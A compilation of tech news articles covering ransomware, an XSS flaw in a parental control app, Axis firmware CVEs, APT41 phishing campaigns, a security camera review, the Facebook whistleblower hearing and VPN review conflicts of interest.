Information Technology

Hong Kong marketing firm Fimmick has been hit with a ransomware attack, according to a British cybersecurity firm monitoring the situation.Fimmick has offices in Hong Kong and across China, serving several high-profile clients like McDonalds, Coca-Cola, Shell, Asus and others. Their website is currently down and there was no response to ZDNet requests for comment. Matt Lane, CEO of UK-based cybersecurity firm X Cyber Group, said his team routinely “scrutinizes the activities of cybercriminals for evidence of their behaviors,” as a way to protect clients and customers. On Tuesday, they discovered that REvil had breached Fimmick’s databases and claimed to have data from a number of global brands. Lane shared screenshots showing REvil’s threatening posts toward Fimmick that included information stolen from the company’s website”We discovered this intelligence as part of those routine activities. We noted, with interest, that the attacker’s ‘Happy Blog’ also appears to be temporarily unavailable but have no further information as to why that might be,” Lane said, adding that the criminal group also shared a directory structure of the stolen data.”You can see Cetaphil, Coca-Cola, Hana-Musubi and Kate Spade are listed.”

Ransomware gangs have targeted marketing firms multiple times over the last few years because of their ties to larger companies with more valuable data. 

John Hammond, senior security researcher at Huntress, said that for ransomware operators, the most attractive targets are the ones that lead to even more targets. “In the same vein that cybercriminals prefer a spray-and-pray approach—always opting for the easiest targets and the low-hanging fruit — ransomware gangs love a one-to-many approach, which requires less effort to bring greater results,” Hammond said. “Marketing firms, PR firms, and organizations that integrate closely with other businesses could have a plethora of data and information that make targeting the next victim even easier. Much like service providers, attacking one could start a domino effect to target others that the original victim worked with. Attacking a marketing firm or PR firm allows ransomware gangs to get a bigger bang for their buck.”Allan Liska, a ransomware expert with cybersecurity company Recorded Future, said there have been at least three other marketing firms hit with ransomware over the last year. Wieden+Kennedy was attacked in November 2020 but was forced to notify Oregon Department of Justice officials in April after employees’ personal information was exposed during the incident. MBA Group was hit in March and Empirical Research Partners in September. “I don’t know if they are particularly ripe compared to other industries but I could see marketing firms being more vulnerable to attack, especially phishing attacks as they are used to dealing with a diverse client base and likely receive a lot of emails with attachments, which is a favorite initial access vector for many ransomware groups,” Liska said. “The actual number of marketing firms hit is likely much higher, but unlike hospitals or schools, when a marketing firm gets hit with ransomware, it doesn’t make the news.” More

A researcher with cybersecurity firm Tripwire has discovered a vulnerability in parental control app Canopy that allows attackers to plant JavaScript into the parent portal and gain access to all the features a parent would have with their child’s device.Tripwire principal security researcher Craig Young told ZDNet that Canopy had been advertised to him through his child’s school, prompting him to look through the app’s cybersecurity features. “I had an interest in learning more about how parental control software is implemented and what, if any, risks it may introduce to families. I discovered these vulnerabilities by intentionally examining how the system processes special characters in parental control requests,” Young said. “My kids’ school sent home advertisements for Canopy and so I thought it would be a good service to learn more about. After signing up for a free trial to see what the service has to offer, I tested what would happen if the parent of a kid had special characters in their request message. It was obvious that Canopy is not filtering the user-input.” From there, he investigated further and realized that the URL in a parental control request was also not being filtered properly. He found that a completely external user can inject this XSS with only a single unknown numeric ID value, allowing an attacker to add JavaScript code to the parent portal for each and every Canopy account.The JavaScript could then be used to do anything from cryptocurrency mining to browser exploits targeting parents. The JavaScript could also be used to export data about the customer accounts including location data from monitored devices. The data dump could be sold for a variety of unwelcome purposes, Young added. An attacker would have full access to the parent portal and all features a parent has for monitoring and controlling child devices, and Young said it looks like an attacker would be able to do this en masse to all customers of Canopy.

Young contacted Canopy but said they have been “minimally responsive,” claiming to have a fix in place. But Young said the fix does not address the full issue and only makes it so a theoretical child is no longer able to attack their parent with the explanation text. But the child can still attack the parent account using the address of a blocked website as the cross site scripting vector and a third party could also do this, Young said. They have not responded to his latest outreach letting them know this. Canopy also did not respond to requests for comment from ZDNet. Canopy offers a multitude of services, including a multi-platform parental control app that allows parents to monitor and limit how their children use a device. Canopy operates as a subscription services, requiring monthly payments. Many of the features offered by the service imply the app is given privileged access to the protected device and is intercepting TLS connections to filter content. Young explained that this privileged access can introduce considerable risk to the security of protected devices and the privacy of the children using those devices.He noted that Canopy implements a VPN connection and uses some form of AI on the device for privacy functions. Through examining how the app functions, Young discovered that the Canopy system is failing to sanitize user-inputs leading to cross-site scripting, which allows attackers to embed an attack payload within an exception request.”Although there may be a wide range of ways a clever kid could abuse this vulnerability, the most obvious would be to automatically approve a request. The input field did not seem to have any sanitization and allowed 50 characters which was plenty to source an external script,” Young explained in his report. “My first test was a payload to automatically click to approve the incoming request. This worked well and I quickly got another payload working to automatically pause monitoring protection. At this point, the child using the protected device could inject arbitrary JavaScript into an authenticated parent session. This could be useful for a variety of child-to-parent attacks including making a self-approving exception request or a request which automatically disables the monitoring software when viewed. This is bad, but it could be worse.” Young did note that this kind of exploitation is “noisy,” meaning a parent needs to interact with the malicious request and may recognize the attack in progress. 

Further examination of the Canopy app showed that the system could be tricked by combining double and single quotes. With that, someone could submit an exception request which takes control of the Canopy app when the parent simply logs in to check on the monitored devices.”This situation does not bode well for the Canopy parental control system but at the same time, you may be wondering if this is really a big deal. After all, most kids who are being monitored with this system aren’t going to have a clue about XSS or have access to a parent console to develop an exploit payload,” Young wrote. “Unfortunately, the attack surface for this vulnerability is quite a bit more substantial than what was discussed earlier with request explanation text. Because this attack involves a crafted URL being blocked, it becomes possible for attacks to come from completely external third-party sources. Anyone who can get a child using the protected device to click a link can now potentially attack the parent’s monitoring this account.” A child only needs to be convinced to click on a request access button once the URL has been loaded, but Young said the scariest part is that the Canopy API design will “even allow the external attacker to directly plant a cross-site scripting payload on a parent account by guessing the parent account ID.”Due to the relatively short length of account IDs, attackers could theoretically seed the attack payload on every single parent account by simply issuing a block exception request for each ID value in sequence, according to Young. “The external attacker may use this to redirect the parent to advertisements, exploits or other malicious content. Alternatively, an attacker could plant a payload to hijack access to the parental control app and pull GPS coordinates from protected devices on the account,” Young said. “From my perspective, this is a pretty fundamental failure for an app advertising it can keep kids safe online.”A number of cybersecurity experts told ZDNet that these types of flaws are present on a large number of services.Oliver Tavakoli, CTO at Vectra, said the developers of the Canopy service seem to lack an understanding of how to secure a service against malicious actors, adding that by not cleansing input fields or data (such as URLs) received from the internet “is to fail Security 101.” Tavakoli did say that this particular flaw is somewhat harder to exploit because it requires coaxing a child to click on a link in order to deliver a payload to a parent system.Others said the vulnerability was another example of why “Injection” flaws have been in the OWASP Top 10 for more than a decade.Ray Kelly, principal security engineer at NTT Application Security, said developers are still being careless when accepting untrusted and unfiltered input from users.  “Accepting unfiltered input can lead to a cross-site scripting vulnerability which can create a wide range of issues. This includes stealing a user session cookies, redirecting to a malicious website or embedding a keylogger,” Kelly said.  “This also demonstrates why security testing of all inputs in a web application is so important and how it can reach to mobile devices, drastically increasing your attack surface.”When asked how Canopy can fix the issue, Young said Canopy needs to sanitize all user-input values. “I would also recommend that Canopy establish a security reporting policy and guidelines for how researchers can responsibly probe their systems and share technical feedback,” Young added.  More

Nozomi Networks Labs unveiled three different vulnerabilities in video recording device software from Axis. Axis has already released firmware updates addressing each issue after being notified about the vulnerabilities in June. The issues affected Axis OS Active track 10.7, Axis OS 2016 LTS track 6.50.5.5, Axis OS 2018 LTS track 8.40.4.3, Axis OS 2020 LTS track 9.80.3.5, Axis OS Active track 10.8, Axis OS 2016 LTS track 6.50.5.5, Axis OS 2018 LTS track 8.40.4.3 and Axis OS 2020 LTS track 9.80.3.5.Axis is a billion-dollar company with offices in more than 50 countries and systems in iconic locations like the White House, Sydney Airport, the Moscow Metro, the Madrid bus system and the City of Houston. Researchers with Nozomi Networks Labs bought an Axis Companion Recorder and sought to investigate the cybersecurity features of the equipment. They discovered a heap-based buffer overflow (CVE-2021-31986, CVSSv3 6.7), improper recipient validation in network test functionalities (CVE-2021-31987, CVSSv3 4.1) and SMTP header injection in email test functionality (CVE-2021-31988, CVSSv3 5.5).The researchers found the heap-based buffer overflow vulnerability in the read callback function, which “failed to verify that no more than ‘size’ multiplied with ‘items’ number of bytes are copied in the libcurl destination buffer.”They found that the parameters provided are “externally controllable and were insufficiently validated by the server-side code prior to reaching the read callback function.”

CVE-2021-31987 is related to the test functions of HTTP, email and TCP recipients, which have blocklist-based security checks to impede interactions with localhost-exposed network services. Nozomi Networks Labs researchers found that this could be circumvented with known bypasses or were incomplete.”By convincing a victim user into visiting a specifically crafted webpage while logged-in to the Companion Recorder web application, an external remote attacker can interact with internal-only services running on the device, obtaining access to restricted information,” the security company wrote. “The third vulnerability is due to an SMTP header injection, located in the SMTP test function. By convincing a victim user into visiting a specifically crafted webpage while logged-in to the Companion Recorder web application, an external remote attacker can trick the device into sending malicious emails to other users with arbitrary SMTP header values. This can be abused to perform phishing attacks, spread malware via emails, or disclose internal information.”CVE-2021-31986 and CVE-2021-31988 affect Axis OS Active track 10.7, Axis OS 2016 LTS track 6.50.5.5, Axis OS 2018 LTS track 8.40.4.3, Axis OS 2020 LTS track 9.80.3.5. CVE-2021-31987 is found in Axis OS Active track 10.8, Axis OS 2016 LTS track 6.50.5.5, Axis OS 2018 LTS track 8.40.4.3 and Axis OS 2020 LTS track 9.80.3.5.After Nozomi Networks Labs contacted Axis with the issues in June, the company confirmed them in July and worked with the researchers to verify the firmware updates. Nozomi Networks Labs said some devices are not included and will “receive a patch according to their planned maintenance & release schedule.” More

Cybersecurity focuses on protecting electronic information on websites, networks, or devices from hackers. Through advanced technology and sophisticated processes, cybersecurity professionals help keep data safe and accessible.Individuals and businesses alike face cybersecurity threats. In addition, businesses need protection from unauthorized data access — both from inside and outside the organization. Strong cybersecurity reduces the chances that a cyber attack will affect business operations.Cybersecurity also has political implications. The US Department of Homeland Security designated election infrastructure as “critical” in 2017. This infrastructure includes voter registration databases and the digital technologies used to count, display, and confirm voting results — some of America’s most sensitive data. 
And cybersecurity can also affect public safety and health. In one case, hackers attempted to poison the municipal water supplies of cities in Florida and California. The hackers gained access to the technology platforms controlling the water systems. Luckily, officials caught the hacks before anyone got sick. Individuals can take simple steps to maintain their cybersecurity, like using a password manager app. But businesses typically require more sophisticated, proactive cybersecurity strategies. As a result, the number of people responsible for handling a company’s cybersecurity depends on an organization’s resources and operational needs. A company might have a large cybersecurity team, or just one person with multiple digital duties.Is cybersecurity considered an IT job?People who work in cybersecurity often work closely with other IT professionals, like network administrators or in various roles. For this reason, experts and those within the industry often group cybersecurity jobs within the broader sector of IT.

Despite the need to work together with other technology professionals, cybersecurity employees tend to focus on different issues than IT workers. These issues include preventing and analyzing data security incidents and developing and enforcing security standards to protect digital information.In most cases, cybersecurity is considered an IT job. However, cybersecurity jobs usually focus on protecting digital information. Some organizations may title these individuals “cybersecurity specialist” or “cybersecurity manager.” Related cybersecurity job titles include cybersecurity engineer or cybersecurity administrator. 
5 reasons why cybersecurity is importantMillions of Americans share personal information on the internet every day — whether while working remotely, making online purchases, or completing financial transactions. That makes cybersecurity more important than ever. 1. Cybercrimes are risingIn an increasingly digitized and connected world, cybercrime can cause major disruptions. As more workplaces moved to remote work in 2020, the number of cyberattacks skyrocketed. One study found a 400% increase in cybercrime in 2019-2020. In addition to a growing number of cybercrimes, the types of attacks have grown. Malware, phishing, and DDoS attacks can take down major corporations and risk the private data of millions of people. 2. Your data is valuableCyberattacks target both individuals and systems. These cybercriminals seek out private data, including financial information. That data is valuable. Stealing someone’s Social Security number, for example, makes it easy to take out credit cards in their name and run up debt. So does targeting dates of birth, credit card information, and addresses.3. Cybercrimes result in economic costsThe economic cost of cybercrimes runs into the trillions. According to one estimate, cyberattacks cost the global economy $1 trillion every year. Ransomware attacks can bankrupt companies, disrupt financial markets, and tank people’s personal finances. The cost of cybercrimes makes it even more important to implement security systems and increase internet safety.4. Your devices could be exploitedEvery day, hackers come up with new ways to break into systems and exploit devices. Take cryptojacking, for example. Hackers use a target’s devices to mine cryptocurrency for the hacker. Add that to a long list of cybercrimes like proxy phishing, password attacks, and malware.5. Cyberattacks pose real-life threatsCybercrime might seem like a distant problem that only affects a small number of people. But cyberattacks don’t only target information security. They can also compromise infrastructure, which threatens health and safety. In late 2020, for example, ransomware attacks targeted U.S. hospitals. These attacks tried to steal data to force hospitals to pay a ransom. And hospitals aren’t the only target. Schools, law enforcement agencies, and governments have all been the victims of cyberattacks.How to protect yourself against hackers and cyberattacksYou can take several simple steps right now to protect your data from hackers and prevent cyberattacks. Here are the best ways to make your data safer. Follow password best practicesA strong password keeps hackers from breaching your accounts. Instead of reusing the same password on multiple platforms, create unique, complex passwords, particularly for sites that store private data or credit card information. Worried about keeping all those passwords straight? Consider getting a password manager so you’ll never forget your password again.Change your password after a breachTake a look at current events and there’s a good chance you’ll hear about a data breach. After a breach, you should change your password — but recent research shows that few people actually update their passwords. That leaves your data vulnerable to a cyberattack. The site Have I Been Pwned lets users check whether their accounts may have been compromised.Learn to spot phishing attemptsEvery email inbox receives spam emails. Most of us know not to open emails from Nigerian princes. But every day, people click on phishing emails claiming to offer prizes or asking customers to “verify” details. These phishing attempts trick people into giving up their own personal info. Make sure you understand common phishing red flags to dodge cyberattacks. Install antivirus softwareInstalling antivirus software on your devices — including cell phones — helps protect your data against malware, viruses and other cyberattacks.These software programs secure your passwords, block malware, and protect financial data during online transactions. Major providers include Norton Antivirus, McAfee Total Protection, and Kaspersky Total Security. Before installing or downloading antivirus software, consider your needs and find the right provider to protect your internet safety. In conclusionCybersecurity matters for everyone, even people who don’t think they use technology directly. Nearly every aspect of modern life involves sharing digital information. That’s why, no matter the industry, cybersecurity is essential. Cybersecurity professionals work to keep personal and business information safe from current — and future — threats.
What is cybersecurity?

Cybersecurity is the profession of protecting digital information, devices, and networks from unauthorized users. People in this profession also ensure the integrity, security, and accessibility of information for authorized users.

How does cybersecurity protect us?

Cybersecurity protects digital information — and the people who use networks, computers, and devices — from unauthorized access or data loss.

How can we prevent cybercrimes?

Information security specialists help prevent cybercrimes by protecting personal data, implementing security systems, and investigating cybercrimes. People can also spot scams and use antivirus software to prevent cybercrimes.

Why is cybersecurity important for students?

Like everyone else, students need to protect their private data. Students can also study cybersecurity to launch careers in a growing tech specialty. 

ZDNet Recommends More

The BlackBerry Research & Intelligence team released a new report on Tuesday linking disparate malware campaigns to Chinese cyberespionage group APT41, noting that the group has been taking advantage of Cobalt Strike activity using a bespoke Malleable C2 Profile that uses COVID-19 phishing lures to target victims in India.The team was able to link phishing lures via PDF and ZIP files containing information related to tax legislation and COVID-19 statistics, masqueraded as being from Indian government entities. The US government filed charges in 2020 against five APT41 members for hacking into more than 100 companies across the world. US officials said APT41 members managed to compromise foreign government computer networks in India and Vietnam, as well as pro-democracy politicians and activists in Hong Kong. The APT41 group is one of the most infamous and active state-sponsored hacking groups. ATP41’s operations were first detailed in a FireEye report published in August 2019, with the report linking the group to some of the biggest supply-chain attacks in recent years, and to older hacks going to as early as 2012.The group uses publicly-available profiles designed to look like legitimate network traffic from Amazon, Gmail, OneDrive and others. BlackBerry found connections between this campaign and others published by FireEye in 2020, as well as Prevailion, Subex and PTSecurity.”The image we uncovered was that of a state-sponsored campaign that plays on people’s hopes for a swift end to the pandemic as a lure to entrap its victims. And once on a user’s machine, the threat blends into the digital woodwork by using its own customized profile to hide its network traffic,” the team said in its report. “APT41 is a prolific Chinese state sponsored cyber threat group that has conducted malware campaigns related to espionage and financially motivated criminal activity dating as far back as 2012. This threat group has targeted organizations around the world, in many verticals such as travel, telecommunications, healthcare, news, and education. APT41 has often used phishing emails with malicious attachments as an initial infection vector. Once they have gained access to a target organization, they typically deploy more advanced malware to establish a persistent foothold. This group uses a variety of different malware families including information stealers, keyloggers, and backdoors.”

The researchers said they discovered what they believe to be additional APT41 infrastructure and phishing lures targeting victims in India that contained information related to new tax legislation and COVID-19 statistics. These messages purported to be from Indian government entities, the report said. The goal of the attack was to load and execute a Cobalt Strike Beacon on a victim’s network using the phishing lures and attachments. FireEye and other cybersecurity companies have spent years documenting APT41’s tactics and the BlackBerry team said it found a malleable C2 profile on GitHub that resembled one mentioned by FireEye and authored by a Chinese security researcher with the pseudonym ‘1135’.”These profiles had several similarities: both used jQuery Malleable C2 Profiles, and portions of the HTTP GET profile block are almost identical. HTTP header fields such as ‘accept’, ‘user-agent’, ‘host’, and ‘referer’, as well as the ‘set-uri’ field, were all exact matches to the profile data listed in the FireEye blog,” the report explained. “By extracting and correlating the HTTP headers used in the GET and POST requests defined in the Beacon configs, we can generate revealing connections between seemingly disparate Cobalt Strike infrastructure. While we identified a relatively small number of Beacons using the BootCSS domain as part of their malleable C2 configuration, there were also a few clusters with unique configuration metadata that enabled us to identify additional beacons related to APT41. The Beacons served by these new nodes are using a different malleable profile to those in the original cluster that attempts to make the Beacon traffic look like legitimate Microsoft traffic.”The domains the team found also have similar naming convention, and in looking through the campaign, BlackBerry discovered a set of three PDFs linked to .microsoftdocs.workers[.]dev domains targeting victims in India. The lures promised information related to taxation rules and COVID-19 advisories.The first PDF related to tax rules contains an embedded PowerShell script that is executed while the PDF is displayed to the user. “The PowerShell script downloads and executes a payload via “%temp%conhost.exe’, which loads a payload file called ‘event.dat’. This .DAT file is a Cobalt Strike Beacon. The second and third lures each have similar execution flows and component parts; a PDF lure, conhost.exe, and an event.* payload. In this case, these event files had a .LOG extension, rather than .DAT,” the report found. “The biggest difference between the second and third lures is that the first uses a self-extracting archive named ‘India records highest ever single day covid_19 recoveries.pdf.exe’, and the second uses a ZIP file named ‘India records highest ever single day COVID-19 recoveries.zip’. Lures two and three also contain the same information within their respective PDFs. Both relate to a record high number of COVID-19 recoveries in India, information which purports to be from the Indian Government Ministry of Health & Family Welfare.”The researchers noted that a previous September 2020 report from Subex found similar phishing attempts also targeted at Indian nationals. That report attributes the attack to the Evilnum APT group but the BlackBerry researchers disagreed, citing a number of reasons why they believe the culprit is APT41. The payloads are actually Cobalt Strike Beacons, a hallmark of APT41 according to BlackBerry, and there are a number of configuration settings that tie the attack to APT41. “With the resources of a nation-state level threat group, it’s possible to create a truly staggering level of diversity in their infrastructure. And while no one security group has that same level of funding, by pooling our collective brainpower we can still uncover the tracks that the cybercriminals involved worked so hard to hide,” the researchers added.  More

Pros

✓Pan, tilt, and zoom from the app

✓Loud siren

✓Clear images at night

Cons

✕Must have NVR or PoE switch to work

The Reolink RLC-811A security camera is large and sturdy with a well-built metal housing and a strong metal mount. This camera means business.

The RLC 811A uses PoE (Power over Ethernet), so you do not need to position it near to a power supply to use it. Run an Ethernet cable up to 330ft in length to the camera, connect the Ethernet cable to a PoE injector and connect the PoE injector to a power adapter inside your home. The PoE injector does not come with the RLC 811A, but you can buy PoE switches from TP-Link or Netgear on Amazon. Alternatively, you can buy an NVR (Network Video Recorder) directly from Reolink to store local recordings. In the box, there is the camera, which is rated IP66, so is waterproof and dustproof, a waterproof connection, a 1m Ethernet cable and a pack of screws with wall plugs. There is also a quick start guide, a paper template for drilling, and a surveillance sign. The camera is fitted with a metal case and an overhanging cowl to stop rain from hitting the lens. Five LED spotlights will illuminate up to 100ft, a sensor, and four infrared lights. At the rear of the camera, there is a metal cover for the SD card, screwed into the camera housing. The RLC 811A will support an SD card of up to 256GB capacity.

Top ZDNET Reviews

I had issues turning the camera on initially, but pressing the reset button cable for 10 seconds made the camera bleep which let me know that the camera was ready to connect and initialise. To connect the camera to the Reolink app, either scan the QR code or find the camera model listed in the LAN list and connect. The camera will initialise and show you the live view of the area.
Reolink
The RLC-811A is a 4K camera with 3840x2160px resolution, 5x optical zoom, and when zoomed in, the image is still fairly crisp. Its viewing angle ranges from 31 to 105 degrees. The camera also has a motorised lens ranging from 27mm to 13.5mm. You can use the pan, tilt, and zoom to control the camera from your app. Setting the push and siren notifications means that you will receive an email and a push notification when the camera detects something in its motion zone. Outside, the siren will sound, and the spotlights will illuminate the object in its path. Its two-way microphone allows you to talk to whoever is in your field of view. The audio is loud and clear, and the microphone, situated underneath the camera, is easily heard. You can also record a voice clip that will play instead of a siren.
Reolink
The onboard siren is very loud and will certainly alert anyone within the camera’s field of view that they are being watched. You can specify when you want the siren to sound and set schedules for when detected motion will not trigger the siren. You can also select zones that the camera will ignore and will not trigger an alert and how sensitive you want the camera to be. You can even specify what you want the camera to detect — either humans or vehicles. I like the time-lapse feature on this camera. Turn it on, and the camera will take images at regular intervals during the day and save the video onto the SD card. Unfortunately, the time-lapse feature does not work if you have an NVR. It is a great way to find out what happens during the entire day in your backyard. You can integrate the RLC-811A with your smart home appliances. Select the device and click enable to use hands-free voice commands or display the view outside on your Chromecast TV. You can choose to add an SD card to the camera if you do not want to use an NVR. You can not use Reolink’s cloud storage with this model at the moment. However, cameras like the Reolink Go PT, Argus 3, Argus PT, and E1 Zoom do use this feature. For under $110, there is little not to like about the Reolink RLC-811A security camera. It is a pain to set up if you do not have an NVR, and you need to purchase a PoE injector and power adapter to deliver power to the unit. But once the RLC-811A is connected and configured, you can relax knowing that your home is secured. If there are any issues, your security camera will sound the alarm, allow you to speak to the visitor, and capture a really detailed image of the person entering your space, day or night. More

The whistleblower whose disclosures became a catalyst for a Senate inquiry into Facebook’s operations has declared the company as “morally bankrupt,” casting “the choices being made inside of Facebook” as “disastrous for our children, our privacy, and our democracy.”

On Tuesday, US Senator Richard Blumenthal chaired a hearing of the Subcommittee on Consumer Protection, Product Safety, and Data Security, with Facebook whistleblower Frances Haugen as a witness.  Blumenthal thanked the whistleblower for her “strength and courage in coming here today.” Haugen, who used to work as the lead product manager for Facebook’s civic misinformation team, told the Senate that Facebook “intentionally hides vital information from the public, the US government, and governments around the world.” The whistleblower also told the Senate members that Facebook “is choosing to grow at all costs” — which means that profits are being “bought with our safety.” This, in turn, is encouraging “more division, more harm, more lies, more threats, [and] more combat” online.”No one truly understands the destructive choices made by Facebook, except for Facebook,” Haugen said.Antigone Davis, Facebook Director and Global Head of Safety, appeared at a hearing last week in which the Senate chastised the social media company for failing to do enough to protect younger users, and also accused Facebook of putting profit before safety by hiding the knowledge that the Instagram app causes mental harm.

The allegations stem from The Facebook Files, a series of investigations posted by The Wall Street Journal. The articles are based on internal files, draft presentations, research, and internal staff communication leaked by the whistleblower. While the reports explore a variety of topics including Facebook algorithms that made users “angrier” and how the company allegedly does not apply the same terms of service rules to some high-profile users as the general public, the main thrust of the reports — branded a “bombshell” by Blumenthal — revolved around the ‘toxic’ nature of Facebook’s platform to teenagers, especially young girls.  The research in question explores areas including social comparisons, loneliness, anxiety, sadness, and eating issues. The WSJ reports suggest that some teenagers suffering from suicidal thoughts were able to trace them back to Instagram.The WSJ published six of the internal documents which were the basis of its investigation. Facebook then published two of them, complete with annotations last week.  Facebook has accused the publication of deliberate mischaracterizations. Davis said, “We strongly disagree with how this reporting characterized our work, so we want to be clear about what that research shows, and what it does not show.” Davis insisted that the internal research did not create “causal relationships between Instagram and real-world issues,” and while Instagram was indicated as a source that could make girls suffering from body image issues feel worse, this was one of the numerous topics included in the research — and many teenagers suffering from various problems have a positive experience on Instagram. The latest hearing, titled “Protecting Kids Online: Testimony from a Facebook Whistleblower,” allowed the whistleblower’s testimony to be heard and for her experiences working at Facebook to be explored. When queried about its use of algorithms and engagement-based rankings to promote specific types of content that could be harmful, Haugen said that “Facebook knows that its amplification algorithms can lead children from innocuous topics — such as healthy food recipes — to anorexia-promoting content over a short period of time.” The whistleblower claims that Facebook has re-created experiments to test out amplification algorithms that could cause this transition from safe to dangerous topics — and so the company “knows” this happens. Haugen added that Facebook CEO Mark Zuckerberg “has built an organization that is very metrics-driven — the metrics make the decision,” and, therefore, “the buck stops with him.”Facebook has paused a plan to develop a version of Instagram for kids, citing the need for more time to work more closely with “parents, experts, policymakers and regulators.” Haugen suggested that we could see the platform rolled out in a year, commenting:”Facebook understands that if they want to continue to grow, they have to find new users. The way they’ll do that is to ensure kids establish habits before self-regulation.”When asked if this is what she meant by “hooking kids?,” the whistleblower agreed. The chair of the committee remained critical of Facebook, saying in today’s hearing that “their profit was more important than the pain that they caused.” Blumenthal also urged Zuckerberg to appear before the Senate. Haugen called for the Senate to act, commenting:”A company with such frightening influence over people […] needs real oversight. However, its closed design means there is no oversight.””Facebook can change but clearly will not do so on its own,” the whistleblower added. “Congress can change the rules Facebook plays by and can stop the harm Facebook is causing. […] We still have time to act, but we must act now.”Davis said last week that Facebook would not “retaliate for them [the whistleblower] coming to the Senate,” however, this does not mean there will not be legal repercussions for sharing corporate documents with the WSJ. Blumenthal acknowledged that the whistleblower came forward at “great personal risk” and said the Senate will do “everything and anything we can to stop retaliation.”On September 30, Senators Blumenthal and Edward Markey reintroduced a bill designed to bolster the privacy and security of minors inline. The Kids Internet Design and Safety (KIDS) Act, if accepted, is legislation that aims to prevent manipulative marketing, push alerts, ‘like’ and follower functionality, and features that reward those under 16 for spending more time on their devices.  In other Facebook news, the social media giant experienced a six-hour outage on Monday that also disrupted service for billions of users across Instagram and WhatsApp. Facebook believes the issue was caused by configuration changes that went awry. “We want to make clear at this time we believe the root cause of this outage was a faulty configuration change,” the firm said. “We also have no evidence that user data was compromised as a result of this downtime.” Update 18.57 BST: Facebook’s Lena Pietsch, director of policy communications, has issued the following statement:”Today, a Senate Commerce subcommittee held a hearing with a former product manager at Facebook who worked for the company for less than two years, had no direct reports, never attended a decision-point meeting with C-level executives — and testified more than six times to not working on the subject matter in question. We don’t agree with her characterization of the many issues she testified about. Despite all this, we agree on one thing; it’s time to begin to create standard rules for the internet. It’s been 25 years since the rules for the internet have been updated, and instead of expecting the industry to make societal decisions that belong to legislators, it is time for Congress to act.” Previous and related coverage Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0 More

Shutterstock
There are VPN users who use VPNs just so they can safely surf the internet from a coffee shop, hotel, or airport. Before the COVID-19 pandemic, I mostly fell into that category. There are VPN users who, as mentioned, mostly use VPNs to spoof their location so they can watch blacked-out sports events or get Star Trek Discovery via Netflix instead of Paramount+.

And then there are the people I’m writing this article for: the folks for whom VPN usage is a life-or-death thing. These people are citizens in nations with oppressive regimes trying to communicate with the outside world, people who are researching health or sexuality information that could cause them to be discriminated against (or worse), people who are trying to hide their location from abusive partners or stalkers, people who are dissidents (which is not a pejorative, but a word used to describe people who are fighting totalitarian regimes and oppressive government policies), and so on. Also: How to find and remove spyware from your phone It’s for these people, who I’ll call the life-and-deathers, for whom this article is being written. And if you fit into this category, listen up. What I’m about to say could save your life. VPNs (or virtual private networks) generally do a few key things. They encrypt your internet traffic between your computer and a destination on the internet. If you’re using a corporate VPN, it creates a secure tunnel between your machine and your company’s network. VPN services, with familiar names like ExpressVPN, Surfshark, and NordVPN, create secure tunnels between your machine and their servers — but the connection from their servers to whatever destination server you’re accessing is secured by whatever base protocol you’re using to communicate to that final server. VPN services also purport to hide your IP address from the internet and allow you to spoof your geographical location. This is a service absolutely necessary to those concerned about their safety. Unfortunately, it is a service primarily marketed as a way for users to bypass geographic entertainment restrictions.

There are ethical and unethical reasons people use VPNs. I’m writing this to help protect ethical users, not to encourage or facilitate unethical use. Follow the money You may have noticed that VPN reviews are hugely prevalent all over the internet.  This is because: (A) There’s a lot of interest in VPNs, especially now that people are working from home more often. (B) Because VPN vendors pay so-called objective media outlets to promote them. This is worthy of some detailed discussion. For most of modern history, when a company wanted to promote a product in the media, they’d use one of two mechanisms. They’d either buy ads, or they’d hire a PR firm. The benefit of advertising is that the advertiser has complete control over the message. As long as they can afford to pay for placement, they can say (within reason) whatever they want. Ads are delineated on the page, so consumers can easily tell the difference between them and legitimate reporting. PR is the practice of trying to convince a writer (like me) to write about a product. The benefit (to the vendor) is that PR is generally free. If I choose to write about a product because I think it’s worthy in some way, the vendor isn’t paying for that coverage. But… the vendor also has absolutely no control over what I might say, nor whether or not the product ever gets coverage.

There is some gray area here. While writers often purchase the items they review, many reviewers often receive the things they review for free. Companies want the attention of reviewers and their audiences. Companies can also withhold access, favoring those they know will speak positively or give their products glowing reviews. For example, I never get early access to Apple products because I’ve been critical of the company. Done right, at least historically, marketing has been a mix of good advertising and good PR. But the internet has changed that. It’s now possible to track what people read, what they click on, and what they buy. That technological capability gave rise to a new form of marketing: affiliate marketing. With affiliate marketing, when you click on a link that leads you to buy a product, the seller can see your entire track of interaction. This means the seller can know where you were when you clicked that link. If you click a link on ZDNet and then buy a product on Amazon, Amazon knows that the sale came from an article on ZDNet. If you click on a link on ZDNet (or just about any other website) that has an affiliate code and then buy from Amazon, Amazon also pays a percentage of the sale back to the originating site. The idea is that the affiliate payment encourages sites to cover products. And it works — very, very well. Sites get a lot of revenue (sometimes more than from advertising) from affiliate links. Many sites have full-time affiliate relationship managers who do deals with vendors for a percentage of the sales price — and then encourage editors to write about those products. Done right; there’s no harm in this practice. But what does “done right” mean? Done right means that editorial decisions drive coverage, not business decisions. For example, here at ZDNet, I choose what I want to cover. I get to say what I want to say about a product based on my professional experience. The commerce teams don’t have any input into my objective editorial opinion. If I write a more negative review because readers deserve to be aware of product limitations, no one tells me to hide those limitations. In our case, once I write an article, the affiliate team reads those articles and will sometimes add affiliate links. I have no insight into what deals they have or how much they make. And here’s how that applies to VPNs. I cover a lot of VPN services. I know, generally, that many of the VPN services have affiliate relationships with our commerce team. But I have zero visibility into those deals. As such, I choose the VPNs to cover and what I say entirely based on my editorial judgement. There’s no bias due to business relationships. ZDNet does financially benefit from the fact that I cover VPNs, but not from any specific VPN. But that’s not the case for all online sources of VPN reviews. VPN companies who own VPN review sites Last week, I discussed ExpressVPN’s week of rough news. One detail: ExpressVPN was bought by Kape Technologies for nearly a billion dollars. That sale price, alone, should show you how much these VPN service companies are raking in. See also: Trust, but verify: An in-depth analysis of ExpressVPN’s terrible, horrible, no good, very bad week. But it’s worse. A year earlier, Kape (which also owns VPN vendors Private Internet Access, CyberGhost, and ZenMate) bought a company called Webselenese. This company owns the VPN review site VPNMentor. So which VPNs does VPNMentor recommend as its best of 2021? It’s own: ExpressVPN in first place, CyberGhost in second, and Private Internet Access in third. That’s not suspicious at all (he says sarcastically):
Source: VPNMentor.com
